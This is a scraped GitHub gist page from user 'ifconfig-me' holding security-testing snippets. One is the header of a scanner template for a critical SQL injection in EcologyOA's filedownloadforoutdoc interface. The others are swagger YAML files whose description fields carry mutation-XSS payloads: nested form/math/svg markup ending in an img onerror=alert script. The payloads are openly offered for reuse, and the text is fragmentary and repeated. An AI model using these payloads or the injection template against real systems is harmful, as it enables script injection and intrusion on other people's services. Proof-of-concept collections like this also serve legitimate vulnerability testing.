Skip to content

Instantly share code, notes, and snippets.

View ifconfig-me's full-sized avatar
🎯
Focusing

xiTai ifconfig-me

🎯
Focusing
View GitHub Profile
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><document.domain><path id="</document.domain><img onerror=alert('document.domain') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><document.domain><path id="</document.domain><img onerror=alert('document.domain') src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
@ifconfig-me
ifconfig-me / xss.yaml
Last active September 23, 2022 21:40
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':